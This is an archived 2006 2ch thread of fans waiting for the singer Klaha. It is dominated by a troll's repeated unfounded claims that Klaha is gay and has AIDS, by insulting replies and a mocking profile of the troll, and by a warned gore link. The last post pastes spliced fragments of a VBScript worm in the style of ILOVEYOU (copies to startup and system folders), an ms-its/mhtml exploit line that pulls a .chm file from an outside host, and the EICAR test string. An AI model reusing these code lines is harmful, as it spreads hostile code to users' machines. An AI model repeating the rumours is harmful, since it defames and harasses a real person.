5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

Klaha 6

1 :整理番号774:2006/07/07(金) 21:08:44 ID:Eu4Bzd4b0
心にドッカーン!と響くような作品を誕生させると約束してくれたKlahaを、
相変わらず元気なアトラとチョピンと共に待ち続けるスレです。
sage進行推奨。荒らし煽りは放置でマターリとKlahaを待ちましょう。
980取った人は次スレ立てお願いします。

詳細・過去ログは >>2-4 あたり


2 :整理番号774:2006/07/07(金) 21:09:49 ID:Eu4Bzd4b0
過去スレ

【klaha】
ttp://music2.2ch.net/test/read.cgi/visual/1034583912/
Klaha 2
ttp://music3.2ch.net/test/read.cgi/visual/1049822233/
Klaha 3 -ReMix, ReBuild-
ttp://music4.2ch.net/test/read.cgi/visual/1085576042/
【会費返せ】Klaha四【無職ヒッキー】
ttp://music4.2ch.net/test/read.cgi/visualb/1120548274/
【あの歌声を】Klaha5【もう一度】
http://music4.2ch.net/test/read.cgi/visualb/1135691359/

オフィ
ttp://klahainfo.com/


3 :整理番号774:2006/07/07(金) 21:10:59 ID:Eu4Bzd4b0
■質問する前に…
・ググれ。
・現行スレ内で同じ質問が出ていないか確認。

■新参の人は…
・少なくとも現行スレは読破してから参加。
・教えてちゃん、くれくれ厨カコワルイ

■携帯の人は…
・皆が読みやすいように、適度な改行を。
・PCがあればすぐに解決するような質問は控えて。


4 :整理番号774:2006/07/07(金) 21:11:47 ID:Eu4Bzd4b0
*注意*

Klahaスレには粘着荒らしが居ます。いろいろな手口を使いあなたのレスを誘ってきます。
「なにこいつ?」と思ったら熱くなる前に、書き込む前に一呼吸。

【こんなレスは怪しい?】
・目撃情報・・・嘘の可能性が高いです
・根拠の無い非難。ex."気持ち悪い""ホモ"、"曲が糞"・・・など
・wや〜wを多用。ワンパターンな文法・・・低脳?
・荒らしのレスに対して同意・反論・煽り返しなどのレスをつける・・・など
・当事者のような振り・・・妄想?

粘着荒らし・アンチを発見した場合は【 完 全 無 視 】でお願いします。
【誘導】も【注意】も必要ありません。
 荒 ら し が 【 自 演 】 し て あなたのレスを誘っている可能性があります。
さらに荒らしは一人とは限りません。

スレの健全化のために【 徹 底 無 視 】しましょう。
また荒らしを見つけたら【他の話題をはじめる】のも手です。

相手にされないと判れば、荒らしさんも飽きてくれるかもしれません。
繰り返します。粘着荒らし・アンチを発見した場合は【 完 全 無 視 】でお願いします。


5 :整理番号774:2006/07/07(金) 21:28:27 ID:1Z1jabP+0
重複だろ、削除依頼だせやボケ

6 :整理番号774:2006/07/07(金) 22:26:39 ID:qxoArFRV0
1サソ
乙!

7 :整理番号774:2006/07/07(金) 23:13:05 ID:ILlys9dg0
重複。カキコすんな

8 :整理番号774:2006/07/08(土) 00:13:21 ID:CGA5BMPz0
>>1
乙!

ここが本スレだね。
あっちに立てたアホこそとっとと削除依頼出すように。

9 :整理番号774:2006/07/08(土) 00:27:19 ID:yX/5Xsj30
またーり応援していきましょ

>>5
アラ、付いて来たの?あんたの望みどおり一生あっちに張り付いてたら?(w

10 :整理番号774:2006/07/08(土) 01:36:07 ID:ToTNjZvp0
>>1乙です

あっちは安置スレという事で丁度いいんじゃない?
ホモだゲイだと喜ぶ奴はこっちに来るなよと。
マトモなファンはこっちだけでマッタリいきましょー!

11 :整理番号774:2006/07/08(土) 11:13:49 ID:NstaaMN10
これってUVの連載の時の写真だよね?サングラス似合うね。
ああ無常、三巻だけ持ってないんだよなあ。もう絶版ですよねorz

tp://oasis-hp.x10hosting.com/images/Klaha/vcgg.jpg
tp://g004.garon.jp/gdb/GA/0I/HU/fy/rH/o-/0y/XT/eV/6E/2y/EPD.jpg

12 :整理番号774:2006/07/08(土) 12:06:38 ID:CGA5BMPz0
>>10
基本的に1アーティスト1スレが決まりじゃなかった?

粘着厨はなりきり板にも同じクラ叩きの内容をバカの一つ覚えみたいにw
書き込んでるんだから、そこに張り付いてれば良し!

粘着厨にもアドバイスするがw
同じ事をあちらこちらで書き込むから尚更ウザがられんだよ。ww
あと、アンチスレに誘導目的で良いこと書いても、バレバレだから・・・w
バイバ〜イ!

13 :整理番号774:2006/07/08(土) 15:30:16 ID:0kzrpM4U0
結局荒れそうだな。

14 :整理番号774:2006/07/08(土) 20:14:42 ID:SDMeFZa/0
>>11の下はグロ
これがいつものあいつだとしたら、このスレでは今後もリンクには注意が必要だな

15 :整理番号774:2006/07/09(日) 00:03:54 ID:1qwrYoY6O
ホモだよ こいつ

16 :整理番号774:2006/07/09(日) 00:55:55 ID:5QsZjpLkO
>>1乙〜

これで本スレがたったなw

17 :整理番号774:2006/07/09(日) 01:12:40 ID:+SMrO9Hn0
☆☆☆☆☆☆  重  要  ☆☆☆☆☆☆☆☆

ホモ ゲイ エイズ ひきこもり

これらの項目は全て粘着さんによる妄言です。
一切がある人物の脳内での事実です。

☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆

18 :整理番号774:2006/07/09(日) 01:53:59 ID:1qwrYoY6O
だってホモでゲイでエイズは事実だからね〜 しょうがないよ

19 :整理番号774:2006/07/09(日) 09:38:14 ID:unDHcs4V0
>>18メルヘン買ってねw

20 :整理番号774:2006/07/09(日) 12:03:34 ID:OlGvGLfS0
>>17
キチガイを相手にすんな。奴は死ぬまで変わらない。

21 :整理番号774:2006/07/09(日) 14:57:18 ID:QGPZ8RaS0
だな。でもたまにマジで信じる奴が出てくるから困る。

22 :整理番号774:2006/07/09(日) 19:53:03 ID:1qwrYoY6O
だって事実だからね?ね、ハルナさん(笑)

23 :整理番号774:2006/07/09(日) 22:36:53 ID:+V708zWS0
本スレはこちらですよ。
http://music4.2ch.net/test/read.cgi/visualb/1151938678/l50

24 :整理番号774:2006/07/09(日) 22:53:03 ID:mT2fmLEA0
↑相手にされなくて痺れを切らしたキチガイが営業中w

25 :整理番号774:2006/07/09(日) 22:58:41 ID:SAVdRSXj0
どんどんイタくなっていってるよな粘着君w
もう退いとけって。

26 :整理番号774:2006/07/10(月) 00:01:46 ID:Z4tjbfRXO
一番痛いのはファンを自演しここに毎日いるクラハ本人様。はやく病院いきなよ。うつすなよ。

27 :整理番号774:2006/07/10(月) 00:17:35 ID:6up1DWd40

・・・・・なぁ・・・・?

>>26は何処住んでるの?言ってみ?
つーーーーかfushianaさんしてみ?w




・・・・・・地方在住だったら超笑える・・・・wwww



28 :整理番号774:2006/07/10(月) 00:21:40 ID:0L5Q/D0Y0
>>26
可愛そうに。ホントは好きなのに何かあったんだね。
ま、それも仕方あるまい。僕は彼との再会を信じて待ち続けているよ。

29 :整理番号774:2006/07/10(月) 00:50:29 ID:B2wda8mg0
Klahaのライブでゴスロリのパンツ逆さ撮りしたのも今ではいい思い出・・・

30 :整理番号774:2006/07/10(月) 02:05:03 ID:Z4tjbfRXO
あげられちゃ困るのハルナ姉さ〜んw

31 :整理番号774:2006/07/10(月) 08:04:49 ID:RAishNa6O
く〜ら〜は〜
だいすきだよ

32 :整理番号774:2006/07/10(月) 17:53:52 ID:Z4tjbfRXO
あげホモ

33 :あぼーん:あぼーん
あぼーん

34 :整理番号774:2006/07/10(月) 22:37:47 ID:4tXHi5mB0
クラハがギター持って演奏するのはどの曲だったの?

35 :整理番号774:2006/07/10(月) 22:57:12 ID:Z4tjbfRXO
あげエイズ

36 :あぼーん:あぼーん
あぼーん

37 :整理番号774:2006/07/11(火) 01:06:59 ID:n4xkjBaT0
>>36
早く病院に帰れよw

38 :あぼーん:あぼーん
あぼーん

39 :あぼーん:あぼーん
あぼーん

40 :あぼーん:あぼーん
あぼーん

41 :整理番号774:2006/07/11(火) 05:02:13 ID:19ZhWdza0
あぼ〜んばっかりな件w
どんなに工夫をこらしたレスだとしてももう見えない君www

42 :整理番号774:2006/07/11(火) 07:16:42 ID:zEDDidKTO
まぁみんな何だかんだ言っても倉が好きなんだよきっと

43 :整理番号774:2006/07/11(火) 11:16:37 ID:HIZ47n6yO
あげ。俺は嫌い。ホモのくせに必死に自演して自分は女が好きと訴えるクラハ姉さん。

44 :整理番号774:2006/07/11(火) 11:48:08 ID:n4xkjBaT0
>>43
早く病院に帰れよw w

45 :整理番号774:2006/07/11(火) 15:23:26 ID:WvZnzh9W0
ここの常駐粘着荒らしって、文体だけじゃなくて
貼るAAまで幼稚だよなw
何やってもクオリティヒクス

46 :整理番号774:2006/07/11(火) 15:39:08 ID:zEDDidKTO
頭が弱いみたいだしwしようがない

47 : :2006/07/12(水) 05:07:37 ID:3QKjg/okO
Klaha ずっと待ってるよ…


48 :整理番号774:2006/07/12(水) 06:55:54 ID:HIA+w073O
クラハだいすきだよ

49 :まむし:2006/07/12(水) 20:42:05 ID:KGK+yPlwO
http://pr1.cgiboy.com/S/0383481

50 :整理番号774:2006/07/12(水) 21:57:56 ID:4vjnVYIy0
5割がた見えないんだが・・・
サミシス:;

51 :整理番号774:2006/07/13(木) 02:41:29 ID:2cdC2G5B0
埋め

52 :整理番号774:2006/07/13(木) 11:14:20 ID:oHuuCtM60



53 :整理番号774:2006/07/13(木) 16:57:45 ID:DpCFyI7g0



54 :整理番号774:2006/07/13(木) 19:23:56 ID:vxb87rpG0



55 :整理番号774:2006/07/13(木) 22:44:47 ID:+skwBUa/0
生め

56 :整理番号774:2006/07/13(木) 22:46:03 ID:+skwBUa/0
埋め

57 :整理番号774:2006/07/13(木) 23:16:21 ID:nOm+qXRe0
復活が待ち遠しいなあ

58 :Gackt:2006/07/14(金) 01:50:15 ID:aMfnsCfJ0
俺の猿真似なんて100年早いんだよ、何がKlahaだ、氏ね!

59 :整理番号774:2006/07/14(金) 09:04:55 ID:+psxRNDjO
隠れホモあげ

60 :整理番号774:2006/07/14(金) 18:45:19 ID:aPheUnhM0
粘着厨がスレ乱立して書き込む程に
粘着厨の汚れっぷりが際だってきますねw
どんなに墜ちてもアイツの様にはなりたくないよ、人間だもの byみつお

61 :整理番号774:2006/07/14(金) 20:10:13 ID:3WE7ZbCO0
ホントだね。
何書き込んでもキチガイの発狂レスにしか見えない。
自分で墓穴掘ってどんどん孤立してって下さい。キチガイさん。w
クラハのファンであろうと無かろうと
マトモな人間は誰もあなたの書き込みに賛同してないと思うよ。w

62 :(ヽ´∀`)<最後の大打ち上げ:2006/07/14(金) 22:09:25 ID:jbBEhcxb0
             _ ,( ・∀・)⌒ i  |  Juka「同じ無職ヒッキー同士、仲良くしようZE!」
          (⌒ ー  一 r.、!  〉
           ヽ弋 。 人 。 イ(` ー'
           〔勿\     ヽ
               )  r⌒丶 )  ドカ
     ドカ   ドカ  /   !  |'´
       ドカ    /   /|  |‖ ドカ
             (    く  !  ||‖  ドカ
           ドカ   \  i   | ‖|‖|
            __>  ヽヽ从/从从从
            ⊂⌒ヽ从/ つ(ヽ´Д`つ ←Klaha




             Seth「なんで俺が劣化クラハとか言われてんだよ!無職ヒッキーと一緒にすんじゃねえ!」

       _( ▼_ゝ´)
     /      )           _     _
    / ,イ 、  ノ/        ―= ̄ `ヽ, _
   / / |   ( 〈 ∵. ・(ヽ´Д` 〈__ >  ゛ 、_―
  | !  ヽ  ー=- ̄ ̄=_、  (/ , ´ノ ←Klaha
  | |   `iー__=―_ ;, / / /
   !、リ  -=_二__ ̄_=;, / / ,'
       /  /       /  /|  |
      /  /       !、_/ /   〉
    / _/             |_/
    ヽ、_ヽ





63 :(ヽ´∀`)<最後の大打ち上げ:2006/07/14(金) 22:17:52 ID:jbBEhcxb0
             _ ,( ´∀`)⌒ i  |  ヒローセ「マリスも消滅、UVも廃刊、ホントマリスの面汚しだな、オイw」
          (⌒ ー  一 r.、!  〉
           ヽ弋 。 人 。 イ(` ー'
           〔勿\     ヽ
               )  r⌒丶 )  ドカ
     ドカ   ドカ  /   !  |'´
       ドカ    /   /|  |‖ ドカ
             (    く  !  ||‖  ドカ
           ドカ   \  i   | ‖|‖|
            __>  ヽヽ从/从从从
            ⊂⌒ヽ从/ つ(ヽ´Д`つ ←Klaha




         ユキーエ「私の生活費のマリスミゼルがあんたのせいで無くなったのよ!腹を切って詫びなさい!」

                   _ _     .'  , ..
              _ - ― = ̄  ̄`:, .∴ '     (ヽ´Д`)
       ,J川`∀´)    __――=', ・,‘ r⌒>  _/ /
        /   -―  ̄ ̄   ̄"'" .   ’ | y'⌒  ⌒i ←Klaha
       /   ノ                 |  /  ノ |
      /  , イ )                 , ー'  /´ヾ_ノ
      /   _, \               / ,  ノ
      |  / \  `、            / / /
      j  /  ヽ  |           / / ,'
    / ノ   {  |          /  /|  |
   / /     | (_         !、_/ /   〉
  `、_〉      ー‐‐`            |_/

64 :(ヽ´∀`)<最後の大打ち上げ:2006/07/14(金) 22:23:38 ID:jbBEhcxb0
             京「ついでだから叩いとくか」

       _( ●Д●)
     /      )           _     _
    / ,イ 、  ノ/        ―= ̄ `ヽ, _
   / / |   ( 〈 ∵. ・(ヽ´Д` 〈__ >  ゛ 、_―
  | !  ヽ  ー=- ̄ ̄=_、  (/ , ´ノ ←Klaha
  | |   `iー__=―_ ;, / / /
   !、リ  -=_二__ ̄_=;, / / ,'
       /  /       /  /|  |
      /  /       !、_/ /   〉
    / _/             |_/
    ヽ、_ヽ



        キソト「僕の方が紳士ですよ」

                   _ _     .'  , ..
              _ - ― = ̄  ̄`:, .∴ '     (ヽ´Д`)
         ( - 3 +)    __――=', ・,‘ r⌒>  _/ /
        /   -―  ̄ ̄   ̄"'" .   ’ | y'⌒  ⌒i ←Klaha
       /   ノ                 |  /  ノ |
      /  , イ )                 , ー'  /´ヾ_ノ
      /   _, \               / ,  ノ
      |  / \  `、            / / /
      j  /  ヽ  |           / / ,'
    / ノ   {  |          /  /|  |
   / /     | (_         !、_/ /   〉
  `、_〉      ー‐‐`            |_/





65 :整理番号774:2006/07/14(金) 22:25:42 ID:jbBEhcxb0

(  ´_ゝ`) Gackt「俺の猿真似なんて100年はええんだよ、氏ねこの野郎!」

(§”◆”) Mana「あんたのせいでマリスは活動停止したんだ!責任とりなさい!」

(川・∀・) Kozi「てめえのせいで俺も生活難なんだよ、親のスネかじってんじゃねえよ!」

( ´ハ`) Yu〜ki「旧知の仲とか出鱈目ほざいてんじゃねえ!迷惑なんだよ!」

J川´ー`) Kami「俺の代わりにオマエが氏ねば、マリスは終わらなかったんだよ!!」

( ´_ゝ`川 Tetsu「記憶と空を汚しやがって、何様のつもりだよ、この音痴野郎!」

( ´,_ゝ`) Gaz「俺の次に在籍期間短い癖に、すげえ叩かれようだなwwwww」

( ・∀・) Juka「同じ無職ヒッキー同士、仲良くしようZE!」

( ▼_ゝ´) Seth「なんで俺が劣化クラハとか言われてんだよ!無職ヒッキーと一緒にすんじゃねえ!」

( ´∀`) ヒローセ「マリスも消滅、UVも廃刊、ホントマリスの面汚しだな、オイw」

J川`∀´) ユキーエ「私の生活費のマリスミゼルがあんたのせいで無くなったのよ!腹を切って詫びなさい!」




( ●Д●) 京「ついでだから叩いとくか」

( - 3 +) キソト「僕の方が紳士ですよ」

   

66 :整理番号774:2006/07/14(金) 22:28:25 ID:jbBEhcxb0
                            
                                ホモでもゲイでも素晴らしいミュージシャンはいるわよ
世間の目は冷たいだろうけど、まあ頑張れよ                                         
                 何事もじっくりと、じゃよ                         俺の分まで頑張ってくれな
 (川・∀・)  ( ´ハ`)                          (”◆”§)  (´ー`川し
 (    )  (    )            ミ、ミンナ・・・         (    )  (    )
 | | |   | | |         (ヽ´Д`;)            | | |   | | |
 (__)_)  (__)_)         ノノ Z乙           (_(__)  (_(__)
                            
                            






67 :整理番号774:2006/07/14(金) 23:14:13 ID:PZ/WCr2H0
いくら中傷を続けようとお前が彼に匹敵することはない。
足元に及ぶこともきっと一生ない。
君は彼と違って下らない人生を浪費してしまうんだね。

君が何を言おうとも、僕はこの人に感謝しているんだ。
人生色々あるけどKlahaの曲に元気づけられ、こうして人並みに前向きに生きていられる。
そんな僕に比べてさえも、君は小さくて小さくて仕方がない。

68 :整理番号774:2006/07/15(土) 00:04:04 ID:Z1afFYtg0
☆☆☆粘着さんについて既知事項 ver1.0☆☆☆

・ストーカー体質
 ・ネット世界とはいえ、一年間もの間ストーキング行為 (←ものすごい歪んだ好意。興味深い!!)    
 ・欲求不満 ←毎回のオナニーに必ずサプライズを用意?! 
 ・悲観傾向 ←裏切られたと思い込むことによる自己防衛。本当はKlahaが大好き
 ・自分こそが真のファンであるという自負

・現実世界が充実していない ←人生の敗北者?
 ・友達は居ないっぽい ←気の毒に・・・
 ・2ちゃんでさえ嫌われ者w
 ・地方在住らしい ←結構な田舎っぽい

・Klaha、MALICEMIZERの大ファン
 ・Klahaファンクラブに加入していた
  →05年、会費返還されたことをきっかけに、粘着荒らしデビュー
 ・Klahaの05年クリスマスコメントが発表されたときには一時沈静化(←ホントは好きだってバレバレだわ〜w)
 ・元麺、moiなどにも詳しい
 ・malice、klaha関連のインタビューなども漏れなく精読(←かなりのファン!?)
 ・Voで好きなのはKlaha>>Tetsu。Gacktは嫌いっぽい?

・虚言癖
・ホモ、ゲイに対する思い入れ
・打たれ弱い ←反論されたらすぐ必死



ふぅ、過去ログ漁りも楽じゃないなw

69 :整理番号774:2006/07/15(土) 13:34:31 ID:PKlJ4ELlO
最後ってことはこれでオナニー終わりか。
関係ない人に迷惑かけて気持ちよかったか?w

70 :整理番号774:2006/07/16(日) 02:48:10 ID:vQAjlQYiO
エイズで重病のクラハは

71 :67:2006/07/16(日) 03:42:39 ID:3BRUJCwO0
>>70
お前は小さくて小さくて(ry

72 :整理番号774:2006/07/16(日) 03:51:56 ID:PhpTJUZpO
粘着うざすぎ。これ以上KlahaとMALICE汚すんじゃねーよ。噂でしょ?仮にエイズやゲイでも本当のファンなら関係無いよ。スルーできないでごめん。我慢出来なかった。粘着さんはパソコンで人を叩く事しか時間の使い道が無いんですね^^

73 :整理番号774:2006/07/16(日) 07:16:11 ID:vQAjlQYiO
エイズだからあげなくちゃ!

74 :整理番号774:2006/07/16(日) 11:45:39 ID:8OjWE6doO
いい加減なコメントだすクラハが一番悪い。叩かれて当然。

75 :整理番号774:2006/07/16(日) 11:49:19 ID:vQAjlQYiO
でしょ?(笑)

76 :整理番号774:2006/07/16(日) 12:12:18 ID:C1EFhP310
>>74
残念ながら同意

77 :整理番号774:2006/07/16(日) 12:41:57 ID:ipBWCwCfO
あからさまに自演乙としか言いようがない

なんか君みてるとヒナドリ思い出すんだよね。自分はただ待ってるだけで「うまい餌よこせ〜」ってピーチクパーチク文句たらたら。
そんなに欲しけりゃたまには作曲でもしてみたら?ってね。
彼の偉大さがわかるよ。
え?無能すぎて無理だって?
ばかやろう!!おまえのクソみたいな人生は全ておまえのやる気のせいだろが(怒

78 :整理番号774:2006/07/16(日) 15:43:29 ID:tDmSMkUU0



             rー 、
            ,.. ┴- '、             、′     、 ’、  ′     ’      ;  、
           r'´   ::::`i               . ’      ’、   ′ ’   . ・
             |___ ::::|               、′・. ’   ;   ’、 ’、′‘ .・”
           !゙'ノ、''` | ::|                   ’、′・  ’、.・”;  ”  ’、
      _ril    l ̄ ̄ ̄ , !           .  ’、′  ’、  (;;ノ;; (′‘ ・. ’、′”;
      l_!!! ,、 ,..-ヽ  ,,.. ' ノ`丶--'ー--、 -―--、 ’、′・  ( (´;^`⌒)∴⌒`.・   ” ;  ’、′・
      | ! !_!|i::::::::: ゙^^ー''´:::::::::::::::::::|:::::::::::::::::::::,..、::`ヽ . 、 ’、 ’・ 、´⌒,;y'⌒((´;;;;;ノ、"'人      ヽ
        ! ', ,|!::::::::::::::::::::::::::::::::::::::::::ヽ/---‐'´`\::::\  、(⌒ ;;;:;´'从 ; ;;;;) ;⌒ ;; :) )、   ヽ
      !、_,イ:::ヽ:::::::::::::::::::::::::B:::::::/::|        \:::ヽ、_( ´;`ヾ,;⌒)>>1-77 从⌒ ;) `⌒ )⌒:`.・ ヽ    ,[]
      ',::::::',::::::|ヽ::::::::::::::::::::::::::::/:::::::l         ヽ'◎ ヽ:::::. :::   ⌒(,ゞ、⌒) ;;:::)::ノ    ヽ/´
       ',:::::::',::::! ヽ:::::::::::::::::::::::::::::::::,!          ヽ __ '、ノ  .;:;_)  ...::ノ  ソ ...::ノ
       ',:::::::::::|   ',::::::::::::::::::::::::::::/|         


79 :整理番号774:2006/07/16(日) 15:56:11 ID:tDmSMkUU0
(ヽ´∀`)やっぱマリスミゼルですよね

ttp://2sen.dip.jp:6740/cgi-bin/up/source/up2034.jpg
ttp://2sen.dip.jp:6740/cgi-bin/up/source/up2035.jpg

80 :整理番号774:2006/07/16(日) 16:42:35 ID:EwprQjfb0
粘着さん、何で時々ID変えて書き込んでるの?
自演バレしてるから無駄だよ。
ま・・・・・まさか・・・・バレてないと思ってる?????
「荒らしイケてる!」とか思っちゃってる?????



ほんっとうに、あなた【バカ】なんですねぇ〜〜〜〜wwww

81 :整理番号774:2006/07/16(日) 23:36:55 ID:tdzxOFOVO
ホモちゃいます

82 :整理番号774:2006/07/17(月) 00:44:35 ID:617v/XIV0
やべえ、だんだんムキになっちゃってるよコイツwww
チョー面白いwwww

83 :整理番号774:2006/07/17(月) 02:31:22 ID:TwWZNYjV0
>>68
勝手に追記、某○yもやってるようだ。
「マリスクビになって無職ヒキコモリklaha全音源プゲラ」みたいなタイトルで一時期流れてた。

著作権法いh

84 :整理番号774:2006/07/17(月) 04:06:46 ID:yuLnv79p0
>>83
あ〜あったね。
復讐みたいなつもりだったのかな?w
やり方がマジワロスわ〜、彼
nyにタダ流しとか二ちゃんねるに不審な連続投稿(プッ)、スレ乱立・公開オナニーショウとかもう(笑)

なあ、悪いこと言わないからそんなことする暇あったら
もっと自分見つめなおせよ  自 分
人じゃないだろ?自分だろ?w

85 :整理番号774:2006/07/17(月) 04:30:21 ID:2OuXeLPN0
なあ君よ、思い出してもみたまえよ。
引越しおばさんとか、うんこおじさん(自分の庭にうんこを蒔き、小便を煮るなどして、苦情を一切受け付けなかった中年男性。最近逮捕された)
とか近所迷惑なニュースが最近出てるけどさ、
それみて「こんな風にはなりたくねぇな」と思わなかった?

よーく人々の立場を置き換えて、自分の行動を振り返って見なさいよ。
君は彼らと同類なんだよ。
今だけとかネットだけとかは言い訳だよ。
一時的にせよ君が彼らの同類になるというところが重要なのよ。
どんなDQNがいても、一生見下せないよ。

いいんすか?
君の一度きりの尊い人生は、彼らと同じ生き方でいいんすか?
いいんすか?
いいんすか?
あんな汚くていいんすか?
あんなみっともなくていいんすか?
ホントにいいんすか?w

86 :整理番号774:2006/07/17(月) 08:22:24 ID:SBGBX55GO
必死でホモ否定するハルナ姉さん=クラハw

87 :整理番号774:2006/07/17(月) 11:32:10 ID:nKdCD/ez0
ププッ
あんたの方が必死に見えるw>>86
何度もクラハを挑発してるけど、相手にされてないし届かないと思うよ?


・・・・・どんなに頑張っても無理なのにね、ご愁傷様w

88 :整理番号774:2006/07/17(月) 16:56:00 ID:kKkVa9Ed0
>>86
ほんとにいいんすかぁ?

89 :整理番号774:2006/07/17(月) 17:58:03 ID:d1gfkLxIO
あれ?
最後じゃなかったん?w
やー、みぐるしぃわぁ^_^

90 :整理番号774:2006/07/17(月) 19:14:58 ID:pYWzccCeO
流れ変えよう!みんなはKlahaの曲で何が好き?

91 :整理番号774:2006/07/17(月) 19:20:25 ID:+syx2JZX0
切望。

92 :整理番号774:2006/07/17(月) 22:42:02 ID:kNxinh320
へきやの涯て

93 :整理番号774:2006/07/18(火) 01:30:25 ID:3ipML24s0
太陽の檻

94 :整理番号774:2006/07/18(火) 01:32:34 ID:vNuVV5g80
蒼天白月(だったかな?

95 :整理番号774:2006/07/18(火) 02:02:50 ID:5wNPk38M0
>>79
ワロスw 下の写真違和感ありすぎw

>>74
俺最近マリス知ったから良くわからないんだけど、
どんなこと言ったわけクラハは?
パッと見た感じではガクトより好青年なんだけど。

96 :整理番号774:2006/07/18(火) 02:22:02 ID:DqRAyklIO
隠れホモあげ

97 :整理番号774:2006/07/18(火) 02:42:04 ID:YuOTFIls0
Klahaスレ粘着荒らしの特徴

・ストーカー体質
 ・一年間もの間ストーキング行為 (←ものすごい歪んだ好意。興味深い!!)    
 ・振り向いてもらえるよう、毎回工夫を凝らしたレス(いかんせん、頭が悪いので・・・(ToT) 
 ・悲観傾向 ←裏切られたと思い込むことによる自己防衛。本当はKlahaが大好き
 ・自分こそが真のファンであるという自負(←愛し方を間違えてますよ〜^^;)

・現実世界が充実していない ←人生の敗北者?
 ・友達は居ないっぽい ←気の毒に・・・
 ・2ちゃんでさえ嫌われ者w
 ・地方在住 ←結構な田舎っぽい
 ・なぜか自分はマトモだと考えている

・Klaha、MALICEMIZERの大ファン
 ・Klahaファンクラブに加入していた
  →05年、会費返還されたことをきっかけに、粘着荒らしデビュー
 ・Klahaの05年クリスマスコメントが発表されたときには一時沈静化(←ホントは好きだってバレバレだわ〜w)
 ・元麺、moiなどにも詳しい
 ・malice、klaha関連のインタビューなども漏れなく精読(←かなりのファン!?)
 ・Voで好きなのはKlaha>>Tetsu。Gacktは嫌いっぽい?

・虚言癖
・ホモ、ゲイに対する強い思い入れ ←二言目にはホモホモうるせーの(笑)
・ny厨。nyにKlahaの楽曲ファイルを流す(「〜無職ひきこもり全音源」みたいなファイル名。センスねーよ)
・打たれ弱い ←反論されたらすぐ必死
 ※一度荒らしから足を洗う宣言するものの叩かれたことによりグダグダ荒らし続行(笑)


98 :整理番号774:2006/07/18(火) 02:43:04 ID:YuOTFIls0
>>96
ID変えないでください

99 :整理番号774:2006/07/18(火) 08:32:13 ID:DqRAyklIO
あげあげ さげるなクラたん

100 :整理番号774:2006/07/18(火) 12:16:23 ID:DqRAyklIO
ついでにオカマ

101 :整理番号774:2006/07/18(火) 16:49:06 ID:+rEATlwOO
^^ ルールも守れないなら来ない方がいいんじゃない?ある意味人気者だなww 構ってチャソ見苦しい('A`) わざわざID変えて乙ー。 雑誌見てたら昔のKlahaを見つけた。やっぱり素敵だ。

102 :整理番号774:2006/07/18(火) 18:32:20 ID:IQRrgpc/0
いちいち構うなよ。
スルー汁

103 :整理番号774:2006/07/18(火) 20:52:39 ID:+rEATlwOO
>>102 ‥ごめん(´・ω・`)

104 :整理番号774:2006/07/18(火) 20:57:48 ID:Mvnq5E0W0
scape
聴きこむ程にどんどん好きになっていったなぁ。
久々に聴くかっ!

>>101
いつ頃のKlaha?その雑誌。

105 :整理番号774:2006/07/18(火) 23:08:39 ID:Plfu3OCUO
klahaホモちゃいます

106 :整理番号774:2006/07/19(水) 01:12:47 ID:MpOv2qKJ0
>>105
つまり、オマエの言いたいことはこういうコトだろ?
コレくれてやるからお家に帰りなさい。

つttp://2sen.dip.jp:6740/cgi-bin/up/source/up2039.jpg

107 :整理番号774:2006/07/19(水) 01:48:58 ID:Xt3mhxMF0
そう

108 :整理番号774:2006/07/19(水) 01:49:37 ID:Xt3mhxMF0
途中投稿しちまった・・・スマソ

109 :整理番号774:2006/07/19(水) 03:59:16 ID:n4Y3nhokO
オカマ

110 :整理番号774:2006/07/19(水) 11:27:44 ID:vfg5V9470



111 :整理番号774:2006/07/19(水) 13:14:44 ID:n4Y3nhokO
ホモやでこいつ

112 :整理番号774:2006/07/19(水) 16:12:50 ID:MAHeRov60



113 :整理番号774:2006/07/19(水) 19:25:39 ID:NCrX1KJuO
>>104サソ 亀ですが; UVだったと思います!友達の家で読んだから記憶曖昧で…スマソ。

114 :整理番号774:2006/07/19(水) 23:32:47 ID:2YG1eHWGO
>>111
klaha結婚してまっせ
ホモちゃいます

115 :整理番号774:2006/07/20(木) 00:31:56 ID:crEZc3mmO
Klahaの好きな所ってどこですか?私は詞の世界観と目が好きだな。 あとあの立ち居振る舞いv

116 :整理番号774:2006/07/20(木) 04:32:53 ID:1uDUdaa3O
あのさハルナちゃんさ〜いくらホモ説吹き飛ばしたいからって自ら結婚してまっせって(笑)あんた余計ファン減るで。まぁ、ここ三人くらいしかいないけど。あとハルナ本人でしょ。アンチ私含めて四人でちょうど八人よ!

117 :整理番号774:2006/07/20(木) 11:27:40 ID:k5+GN3xN0
テツスレで全く相手にされてないな、荒らしちゃんw
まぁみんなも気がすんだろ?無視しようぜ
上のほうからも「スレ住人が相手してるからアク禁してあげない」とか言われちゃうんじゃね?しらないけど。

118 :整理番号774:2006/07/20(木) 15:10:37 ID:kXBdSgCV0
>>116
ゲェーーーーッ!?
klahaが八人!!



119 :整理番号774:2006/07/20(木) 21:44:40 ID:1uDUdaa3O
ゲイなんですよ実はアゲ

120 :整理番号774:2006/07/20(木) 23:28:47 ID:VZSEKBQYO
klahaゲイホモちゃいます
子供と幸せに暮らしてますがな

121 :整理番号774:2006/07/21(金) 00:31:54 ID:37atyXsX0
>私は詞の世界観と目が好きだな。

同意〜!目が色っぽいね。
あと、シャイで天然な所もイイw

122 :整理番号774:2006/07/21(金) 02:15:25 ID:f64PVXYiO
>>121サソ 同士がいて嬉しいですww 今、無性にKlahaの声が聴きたいので曲聴いてきますノシ

123 :整理番号774:2006/07/22(土) 12:26:24 ID:7Q6D7UW40
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
